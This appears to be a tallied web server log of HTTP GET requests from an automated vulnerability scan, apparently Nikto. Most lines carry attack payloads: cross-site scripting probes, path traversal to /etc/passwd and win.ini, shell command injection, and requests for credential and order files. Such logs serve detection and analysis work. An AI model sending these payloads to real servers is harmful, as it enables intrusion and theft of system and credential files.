1 GET /_vti_pvt/doctodep.btr HTTP/1.1
1 GET /_vti_pvt/linkinfo.cnf HTTP/1.1
1 GET /_vti_pvt/service.cnf HTTP/1.1
1 GET /_vti_pvt/services.cnf HTTP/1.1
1 GET /_vti_pvt/services.org HTTP/1.1
1 GET /_vti_pvt/svacl.cnf HTTP/1.1
1 GET /_vti_pvt/writeto.cnf HTTP/1.1
1 GET /_vti_txt/_vti_cnf/ HTTP/1.1
1 GET /_vti_txt/ HTTP/1.1
1 GET /a%5c.aspx HTTP/1.1
1 GET /a.jsp/<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /a?<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /a_security.htm HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /acart2_0/signin.asp?msg=<script>alert(\\\"test\\\")</script> HTTP/1.1
1 GET /acceso/ HTTP/1.1
1 GET /access-log HTTP/1.1
1 GET /access.log HTTP/1.1
1 GET /access/ HTTP/1.1
1 GET /access_log HTTP/1.1
1 GET /acciones/ HTTP/1.1
1 GET /account/ HTTP/1.1
1 GET /accounting/ HTTP/1.1
1 GET /accounts/getuserdesc.asp HTTP/1.1
1 GET /activex/ HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /add_user.php HTTP/1.1
1 GET /addressbook/index.php?name=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /addressbook/index.php?surname=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt; HTTP/1.1
1 GET /adm/ HTTP/1.1
1 GET /adm/config.php HTTP/1.1
1 GET /admentor/adminadmin.asp HTTP/1.1
1 GET /admin-serv/config/admpw HTTP/1.1
1 GET /admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv HTTP/1.1
2 GET /admin.cgi HTTP/1.1
1 GET /admin.htm HTTP/1.1
2 GET /admin.html HTTP/1.1
1 GET /admin.php3 HTTP/1.1
1 GET /admin.php4?reg_login=1 HTTP/1.1
1 GET /admin.php?en_log_id=0&action=config HTTP/1.1
1 GET /admin.php?en_log_id=0&action=users HTTP/1.1
1 GET /admin.php HTTP/1.1
1 GET /admin.shtml HTTP/1.1
3 GET /admin/ HTTP/1.1
1 GET /admin/admin_phpinfo.php4 HTTP/1.1
1 GET /admin/browse.asp?FilePath=c:\\&Opt=2&level=0 HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /admin/contextAdmin/contextAdmin.html HTTP/1.1
1 GET /admin/cplogfile.log HTTP/1.1
1 GET /admin/database/wwForum.mdb HTTP/1.1
1 GET /admin/login.php?action=insert&username=test&password=test HTTP/1.1
1 GET /admin/login.php?path=\\\"></form><form name=a><input
1 GET /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\\\"><script>alert(document.cookie)</script> HTTP/1.1
1 GET /admin/system_footer.php HTTP/1.1
1 GET /admin/wg_user-info.ml HTTP/1.1
1 GET /admin HTTP/1.1
1 GET /administration/ HTTP/1.1
1 GET /administrator.cgi HTTP/1.1
2 GET /administrator/ HTTP/1.1
1 GET /administrator/config.php HTTP/1.1
1 GET /administrator/gallery/gallery.php?directory=\\\"<script>alert(document.cookie)</script> HTTP/1.1
1 GET /administrator/gallery/navigation.php?directory=\\\"<script>alert(document.cookie)</script> HTTP/1.1
1 GET /administrator/gallery/uploadimage.php?directory=\\\"<script>alert(document.cookie)</script> HTTP/1.1
1 GET /administrator/gallery/uploadimage.php HTTP/1.1
1 GET /administrator/gallery/view.php?path=\\\"<script>alert(document.cookie)</script> HTTP/1.1
1 GET /administrator/popups/sectionswindow.php?type=web&link=\\\"<script>alert(document.cookie)</script> HTTP/1.1
1 GET /administrator/upload.php?newbanner=1&choice=\\\"<script>alert(document.cookie)</script> HTTP/1.1
1 GET /advwebadmin/ HTTP/1.1
1 GET /affich.php?image=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /agentadmin.php HTTP/1.1
1 GET /agentes/ HTTP/1.1
1 GET /albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd HTTP/1.1
1 GET /ammerum/ HTTP/1.1
1 GET /analog/ HTTP/1.1
1 GET /anthill/login.php HTTP/1.1
1 GET /apache/ HTTP/1.1
1 GET /app/ HTTP/1.1
1 GET /applicattion/ HTTP/1.1
1 GET /applicattions/ HTTP/1.1
1 GET /apps/ HTTP/1.1
1 GET /apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /archivar/ HTTP/1.1
1 GET /archive/ HTTP/1.1
1 GET /archives/ HTTP/1.1
1 GET /archivo/ HTTP/1.1
1 GET /ariadne/ HTTP/1.1
2 GET /article.cfm?id=1'<script>alert(document.cookie);</script> HTTP/1.1
1 GET /article.php?article=4965&post=1111111111 HTTP/1.1
1 GET /article.php?sid=\\\"><Img Src=javascript:alert('Vulnerable')><Img
1 GET /asp/SQLQHit.asp HTTP/1.1
1 GET /asp/ HTTP/1.1
1 GET /asp/sqlqhit.asp HTTP/1.1
1 GET /atc/ HTTP/1.1
1 GET /athenareg.php?pass=%20;cat%20/etc/passwd HTTP/1.1
1 GET /atomicboard/index.php?location=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /auth/ HTTP/1.1
1 GET /authLogin.cgi HTTP/1.1
1 GET /author.asp HTTP/1.1
1 GET /autohtml.php?op=modload&mainfile=x&name=/etc/passwd HTTP/1.1
1 GET /awebvisit.stat HTTP/1.1
1 GET /axis-cgi/buffer/command.cgi HTTP/1.1
1 GET /ayuda/ HTTP/1.1
1 GET /backdoor/ HTTP/1.1
1 GET /backup/ HTTP/1.1
1 GET /bak/ HTTP/1.1
1 GET /banca/ HTTP/1.1
1 GET /banco/ HTTP/1.1
1 GET /bank/ HTTP/1.1
1 GET /banner.cgi HTTP/1.1
1 GET /banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/* HTTP/1.1
1 GET /base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1 HTTP/1.1
1 GET /basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu HTTP/1.1
1 GET /basilix/compose-attach.php3 HTTP/1.1
1 GET /basilix/mbox-list.php3 HTTP/1.1
1 GET /basilix/message-read.php3 HTTP/1.1
1 GET /bb-dnbd/faxsurvey HTTP/1.1
1 GET /bb-hist.sh HTTP/1.1
1 GET /bb000001.pl<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /bbv/ HTTP/1.1
1 GET /bdata/ HTTP/1.1
1 GET /bdatos/ HTTP/1.1
1 GET /beta/ HTTP/1.1
1 GET /bigconf.cgi HTTP/1.1
1 GET /billing/billing.apw HTTP/1.1
2 GET /bin/ HTTP/1.1
1 GET /blah-whatever-badfile.jsp HTTP/1.1
1 GET /blah123.php HTTP/1.1
1 GET /blah_badfile.shtml HTTP/1.1
1 GET /blahb.ida HTTP/1.1
1 GET /blahb.idq HTTP/1.1
1 GET /book.cgi HTTP/1.1
1 GET /boot/ HTTP/1.1
1 GET /buddies.blt HTTP/1.1
1 GET /buddy.blt HTTP/1.1
1 GET /buddylist.blt HTTP/1.1
1 GET /bugs/forgot_password.php?email=\\\"><script>alert(document.cookie)</script> HTTP/1.1
1 GET /bugs/index.php?err=3&email=\\\"><script>alert(document.cookie)</script> HTTP/1.1
1 GET /buy/ HTTP/1.1
1 GET /buynow/ HTTP/1.1
1 GET /bytehoard/index.php?infolder=../../../../../../../../../../../etc/ HTTP/1.1
2 GET /c/ HTTP/1.1
1 GET /c/winnt/system32/cmd.exe?/c+dir+/OG HTTP/1.1
1 GET /c32web.exe/ChangeAdminPassword HTTP/1.1
1 GET /ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt/\\\\win.ini HTTP/1.1
1 GET /ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\/\\\\etc/\\\\passwd HTTP/1.1
1 GET /ca//\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\windows/\\\\win.ini HTTP/1.1
1 GET /ca000001.pl?ACTION=SHOWCART&hop=\\\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f HTTP/1.1
1 GET /ca000007.pl?ACTION=SHOWCART&REFPAGE=\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /cab/top.shtml HTTP/1.1
1 GET /cache-stats/ HTTP/1.1
1 GET /caja/ HTTP/1.1
1 GET /calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05 HTTP/1.1
1 GET /card/ HTTP/1.1
1 GET /cards/ HTTP/1.1
1 GET /cart/ HTTP/1.1
1 GET /cartcart.cgi HTTP/1.1
1 GET /cash/ HTTP/1.1
1 GET /catalog.nsf HTTP/1.1
1 GET /categorie.php3?cid=june HTTP/1.1
1 GET /catinfo?<u><b>TESTING HTTP/1.1
1 GET /cbms/cbmsfoot.php HTTP/1.1
1 GET /cbms/changepass.php HTTP/1.1
1 GET /cbms/editclient.php HTTP/1.1
1 GET /cbms/passgen.php HTTP/1.1
1 GET /cbms/realinv.php HTTP/1.1
1 GET /cbms/usersetup.php HTTP/1.1
1 GET /ccard/ HTTP/1.1
1 GET /ccbill/secure/ccbill.log HTTP/1.1
1 GET /cd-cgi/sscd_suncourier.pl HTTP/1.1
1 GET /cdrom/ HTTP/1.1
1 GET /cersvr.nsf HTTP/1.1
1 GET /cert/ HTTP/1.1
1 GET /certificado/ HTTP/1.1
1 GET /certificate HTTP/1.1
1 GET /certificates HTTP/1.1
1 GET /cfappman/index.cfm HTTP/1.1
1 GET /cfcache.map HTTP/1.1
1 GET /cfdocs.map HTTP/1.1
1 GET /cfdocs/cfcache.map HTTP/1.1
1 GET /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.1
1 GET /cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\\boot.ini HTTP/1.1
1 GET /cfdocs/exampleapp/email/application.cfm HTTP/1.1
1 GET /cfdocs/exampleapp/email/getfile.cfm?filename=c:\\boot.ini HTTP/1.1
1 GET /cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.1
1 GET /cfdocs/exampleapp/publish/admin/application.cfm HTTP/1.1
1 GET /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.1
1 GET /cfdocs/examples/httpclient/mainframeset.cfm HTTP/1.1
1 GET /cfdocs/examples/parks/detail.cfm HTTP/1.1
1 GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.1
1 GET /cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\\boot.ini HTTP/1.1
1 GET /cfdocs/expeval/openfile.cfm HTTP/1.1
1 GET /cfdocs/expeval/sendmail.cfm HTTP/1.1
1 GET /cfdocs/snippets/evaluate.cfm HTTP/1.1
1 GET /cfdocs/snippets/fileexists.cfm HTTP/1.1
1 GET /cfdocs/snippets/gettempdirectory.cfm HTTP/1.1
1 GET /cfdocs/snippets/viewexample.cfm HTTP/1.1
1 GET /cfide/Administrator/startstop.html HTTP/1.1
1 GET /cgi-914/ HTTP/1.1
1 GET /cgi-915/ HTTP/1.1
1 GET /cgi-bin-sdb/ HTTP/1.1
1 GET /cgi-bin-sdb/printenv HTTP/1.1
1 GET /cgi-bin/%2e%2e/abyss.conf HTTP/1.1
1 GET /cgi-bin/.access HTTP/1.1
1 GET /cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')> HTTP/1.1
1 GET /cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E HTTP/1.1
1 GET /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.1
1 GET /cgi-bin/.cobalt HTTP/1.1
1 GET /cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/AT-admin.cgi HTTP/1.1
1 GET /cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 HTTP/1.1
1 GET /cgi-bin/Backup/add-passwd.cgi HTTP/1.1
1 GET /cgi-bin/Count.cgi HTTP/1.1
1 GET /cgi-bin/DCShop/auth_data/auth_user_file.txt HTTP/1.1
1 GET /cgi-bin/DCShop/orders/orders.txt HTTP/1.1
1 GET /cgi-bin/FormHandler.cgi?realNikto=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww[.]example[.]com&recipient=sq%40example.com HTTP/1.1
1 GET /cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww[.]example[.]com&recipient=sq%40example.com HTTP/1.1
2 GET /cgi-bin/FormMail-clone.cgi HTTP/1.1
1 GET /cgi-bin/FormMail.cgi?<script>alert(\\\"Vulnerable\\\");</script> HTTP/1.1
1 GET /cgi-bin/GW5/GWWEB.EXE HTTP/1.1
1 GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.1
1 GET /cgi-bin/LWGate.cgi HTTP/1.1
1 GET /cgi-bin/LWGate HTTP/1.1
1 GET /cgi-bin/MachineInfo HTTP/1.1
5 GET /cgi-bin/MsmMask.exe?mask=/junk334 HTTP/1.1
1 GET /cgi-bin/MsmMask.exe HTTP/1.1
1 GET /cgi-bin/Pbcgi.exe HTTP/1.1
1 GET /cgi-bin/SGB_DIR/superguestconfig HTTP/1.1
1 GET /cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\\&Opt=3 HTTP/1.1
1 GET /cgi-bin/WINDMAIL.EXE?%20-n%20c:\\boot.ini% HTTP/1.1
1 GET /cgi-bin/WS_FTP.ini HTTP/1.1
1 GET /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> HTTP/1.1
5 GET /cgi-bin/ HTTP/1.1
1 GET /cgi-bin/addalink.cgi HTTP/1.1
1 GET /cgi-bin/addbanner.cgi HTTP/1.1
1 GET /cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/admin.cgi HTTP/1.1
1 GET /cgi-bin/admin/admin.cgi HTTP/1.1
1 GET /cgi-bin/admin/setup.cgi HTTP/1.1
1 GET /cgi-bin/administrator.cgi HTTP/1.1
1 GET /cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1
1 GET /cgi-bin/aglimpse.cgi HTTP/1.1
1 GET /cgi-bin/aglimpse HTTP/1.1
1 GET /cgi-bin/alibaba.pl|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\, HTTP/1.1
1 GET /cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1
1 GET /cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.1
1 GET /cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.1
1 GET /cgi-bin/archie HTTP/1.1
1 GET /cgi-bin/architext_query.cgi HTTP/1.1
1 GET /cgi-bin/architext_query.pl HTTP/1.1
1 GET /cgi-bin/astrocam.cgi HTTP/1.1
1 GET /cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[[' HTTP/1.1
1 GET /cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir= HTTP/1.1
1 GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/authLogin.cgi HTTP/1.1
1 GET /cgi-bin/auth_data/auth_user_file.txt HTTP/1.1
1 GET /cgi-bin/awstats.pl HTTP/1.1
1 GET /cgi-bin/awstats/awstats.pl HTTP/1.1
1 GET /cgi-bin/badmin.cgi HTTP/1.1
2 GET /cgi-bin/banner.cgi HTTP/1.1
1 GET /cgi-bin/bannereditor.cgi HTTP/1.1
1 GET /cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/bb-hist.sh HTTP/1.1
1 GET /cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>; HTTP/1.1
1 GET /cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters= HTTP/1.1
1 GET /cgi-bin/bigconf.cgi HTTP/1.1
1 GET /cgi-bin/bizdb1-search.cgi HTTP/1.1
1 GET /cgi-bin/blog/ HTTP/1.1
1 GET /cgi-bin/blog/mt-check.cgi HTTP/1.1
1 GET /cgi-bin/blog/mt-load.cgi HTTP/1.1
1 GET /cgi-bin/blog/mt.cfg HTTP/1.1
1 GET /cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.1
1 GET /cgi-bin/book.cgi HTTP/1.1
1 GET /cgi-bin/boozt/admin/index.cgi?section=5&input=1 HTTP/1.1
1 GET /cgi-bin/bsguest.cgi?email=x;ls HTTP/1.1
1 GET /cgi-bin/bslist.cgi?email=x;ls HTTP/1.1
1 GET /cgi-bin/c32web.exe/ChangeAdminPassword HTTP/1.1
1 GET /cgi-bin/cachemgr.cgi HTTP/1.1
1 GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/calendar.pl HTTP/1.1
1 GET /cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.1
1 GET /cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.1
1 GET /cgi-bin/calendar HTTP/1.1
1 GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a HTTP/1.1
2 GET /cgi-bin/cart.pl?db=' HTTP/1.1
1 GET /cgi-bin/cart32.exe HTTP/1.1
1 GET /cgi-bin/ccbill-local.cgi?cmd=MENU HTTP/1.1
1 GET /cgi-bin/ccbill-local.pl?cmd=MENU HTTP/1.1
1 GET /cgi-bin/cgi-lib.pl HTTP/1.1
1 GET /cgi-bin/cgi_process HTTP/1.1
1 GET /cgi-bin/cgi_wrapper HTTP/1.1
1 GET /cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /cgi-bin/cgicso?query=AAA HTTP/1.1
1 GET /cgi-bin/cgiecho HTTP/1.1
1 GET /cgi-bin/cgiemail-1.4/cgicso?query=AAA HTTP/1.1
1 GET /cgi-bin/cgiemail HTTP/1.1
1 GET /cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/cgiinfo.cgi HTTP/1.1
1 GET /cgi-bin/cgitest.exe HTTP/1.1
1 GET /cgi-bin/cgitest.py HTTP/1.1
1 GET /cgi-bin/cgiwrap/%3Cfont%20color=red%3E HTTP/1.1
2 GET /cgi-bin/cgiwrap/~adm HTTP/1.1
2 GET /cgi-bin/cgiwrap/~bin HTTP/1.1
2 GET /cgi-bin/cgiwrap/~daemon HTTP/1.1
2 GET /cgi-bin/cgiwrap/~ftp HTTP/1.1
2 GET /cgi-bin/cgiwrap/~guest HTTP/1.1
2 GET /cgi-bin/cgiwrap/~listen HTTP/1.1
2 GET /cgi-bin/cgiwrap/~lp HTTP/1.1
2 GET /cgi-bin/cgiwrap/~mysql HTTP/1.1
2 GET /cgi-bin/cgiwrap/~noaccess HTTP/1.1
2 GET /cgi-bin/cgiwrap/~nobody4 HTTP/1.1
2 GET /cgi-bin/cgiwrap/~nobody HTTP/1.1
2 GET /cgi-bin/cgiwrap/~nuucp HTTP/1.1
2 GET /cgi-bin/cgiwrap/~operator HTTP/1.1
3 GET /cgi-bin/cgiwrap/~root HTTP/1.1
2 GET /cgi-bin/cgiwrap/~smmsp HTTP/1.1
2 GET /cgi-bin/cgiwrap/~smtp HTTP/1.1
2 GET /cgi-bin/cgiwrap/~sshd HTTP/1.1
2 GET /cgi-bin/cgiwrap/~sys HTTP/1.1
2 GET /cgi-bin/cgiwrap/~test HTTP/1.1
2 GET /cgi-bin/cgiwrap/~unknown HTTP/1.1
2 GET /cgi-bin/cgiwrap/~uucp HTTP/1.1
1 GET /cgi-bin/cgiwrap/~v9KzH HTTP/1.1
2 GET /cgi-bin/cgiwrap/~web HTTP/1.1
2 GET /cgi-bin/cgiwrap/~www HTTP/1.1
1 GET /cgi-bin/cgiwrap HTTP/1.1
1 GET /cgi-bin/classified.cgi HTTP/1.1
1 GET /cgi-bin/classifieds/index.cgi HTTP/1.1
1 GET /cgi-bin/cmd.exe?/c+dir HTTP/1.1
1 GET /cgi-bin/cmd1.exe?/c+dir HTTP/1.1
1 GET /cgi-bin/com5..........................................................................................................................................................................................................................box HTTP/1.1
1 GET /cgi-bin/com5.java HTTP/1.1
1 GET /cgi-bin/com5.pl HTTP/1.1
1 GET /cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html HTTP/1.1
1 GET /cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.1
1 GET /cgi-bin/common/listrec.pl HTTP/1.1
1 GET /cgi-bin/compatible.cgi HTTP/1.1
1 GET /cgi-bin/contact.cgi HTTP/1.1
1 GET /cgi-bin/count.cgi HTTP/1.1
1 GET /cgi-bin/countedit HTTP/1.1
1 GET /cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.1
1 GET /cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.1
1 GET /cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.1
1 GET /cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.1
1 GET /cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> HTTP/1.1
1 GET /cgi-bin/data/fetch.php?page= HTTP/1.1
1 GET /cgi-bin/date HTTP/1.1
1 GET /cgi-bin/db4web_c/dbdirNikto//etc/passwd HTTP/1.1
1 GET /cgi-bin/db4web_c/dbdirname//etc/passwd HTTP/1.1
1 GET /cgi-bin/dbman/db.cgi?db=no-db HTTP/1.1
1 GET /cgi-bin/dbmlparser.exe HTTP/1.1
1 GET /cgi-bin/dcshop/auth_data/auth_user_file.txt HTTP/1.1
1 GET /cgi-bin/dcshop/orders/orders.txt HTTP/1.1
1 GET /cgi-bin/defaultwebpage.cgi HTTP/1.1
1 GET /cgi-bin/diagnose.cgi HTTP/1.1
1 GET /cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/domainredirect.cgi HTTP/1.1
1 GET /cgi-bin/dose.pl?daily&somefile.txt&|ls| HTTP/1.1
2 GET /cgi-bin/download.cgi HTTP/1.1
1 GET /cgi-bin/dumpenv.pl HTTP/1.1
1 GET /cgi-bin/echo.bat?&dir+c:\\\\ HTTP/1.1
1 GET /cgi-bin/echo.bat HTTP/1.1
1 GET /cgi-bin/empower?DB=whateverwhatever HTTP/1.1
1 GET /cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/entropybanner.cgi HTTP/1.1
1 GET /cgi-bin/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww[.]yourdomain[.]com/ HTTP/1.1
1 GET /cgi-bin/entropysearch.cgi HTTP/1.1
1 GET /cgi-bin/env.cgi HTTP/1.1
1 GET /cgi-bin/environment.cgi HTTP/1.1
1 GET /cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E HTTP/1.1
1 GET /cgi-bin/excite;IFS=\\\"$\\\";/bin/cat /etc/passwd
1 GET /cgi-bin/ezadmin.cgi HTTP/1.1
1 GET /cgi-bin/ezboard.cgi HTTP/1.1
1 GET /cgi-bin/ezman.cgi HTTP/1.1
1 GET /cgi-bin/ezmlm-browse HTTP/1.1
1 GET /cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd| HTTP/1.1
1 GET /cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1 HTTP/1.1
1 GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1
1 GET /cgi-bin/finger.pl HTTP/1.1
1 GET /cgi-bin/finger HTTP/1.1
1 GET /cgi-bin/flexform.cgi HTTP/1.1
1 GET /cgi-bin/flexform HTTP/1.1
1 GET /cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable HTTP/1.1
2 GET /cgi-bin/formmail.cgi HTTP/1.1
1 GET /cgi-bin/formmail.pl HTTP/1.1
1 GET /cgi-bin/formmail HTTP/1.1
1 GET /cgi-bin/fortune HTTP/1.1
1 GET /cgi-bin/foxweb.dll HTTP/1.1
1 GET /cgi-bin/foxweb.exe HTTP/1.1
1 GET /cgi-bin/fpsrvadm.exe HTTP/1.1
1 GET /cgi-bin/gH.cgi HTTP/1.1
1 GET /cgi-bin/gbadmin.cgi?action=change_adminpass HTTP/1.1
1 GET /cgi-bin/gbadmin.cgi?action=change_automail HTTP/1.1
1 GET /cgi-bin/gbadmin.cgi?action=colors HTTP/1.1
1 GET /cgi-bin/gbadmin.cgi?action=setup HTTP/1.1
1 GET /cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls HTTP/1.1
1 GET /cgi-bin/gbpass.pl HTTP/1.1
1 GET /cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1 HTTP/1.1
1 GET /cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 HTTP/1.1
1 GET /cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 HTTP/1.1
1 GET /cgi-bin/get32.exe HTTP/1.1
1 GET /cgi-bin/gm-authors.cgi HTTP/1.1
1 GET /cgi-bin/gm-cplog.cgi HTTP/1.1
1 GET /cgi-bin/gm.cgi HTTP/1.1
2 GET /cgi-bin/guestbook.cgi HTTP/1.1
1 GET /cgi-bin/guestbook.pl HTTP/1.1
1 GET /cgi-bin/guestbook/passwd HTTP/1.1
1 GET /cgi-bin/handler.cgi HTTP/1.1
1 GET /cgi-bin/handler/netsonar;cat /etc/passwd|?data=Download
1 GET /cgi-bin/handler HTTP/1.1
1 GET /cgi-bin/hello.bat?&dir+c:\\\\ HTTP/1.1
2 GET /cgi-bin/helpdesk.cgi HTTP/1.1
1 GET /cgi-bin/horde/test.php?mode=phpinfo HTTP/1.1
2 GET /cgi-bin/horde/test.php HTTP/1.1
1 GET /cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html HTTP/1.1
1 GET /cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/htgrep?file=index.html&hdr=/etc/passwd HTTP/1.1
1 GET /cgi-bin/html2chtml.cgi HTTP/1.1
1 GET /cgi-bin/html2wml.cgi HTTP/1.1
1 GET /cgi-bin/htmlscript?../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E HTTP/1.1
1 GET /cgi-bin/htsearch?-c/nonexistant HTTP/1.1
1 GET /cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.1
1 GET /cgi-bin/htsearch?exclude=%60/etc/passwd%60 HTTP/1.1
1 GET /cgi-bin/ibill.pm HTTP/1.1
1 GET /cgi-bin/icat HTTP/1.1
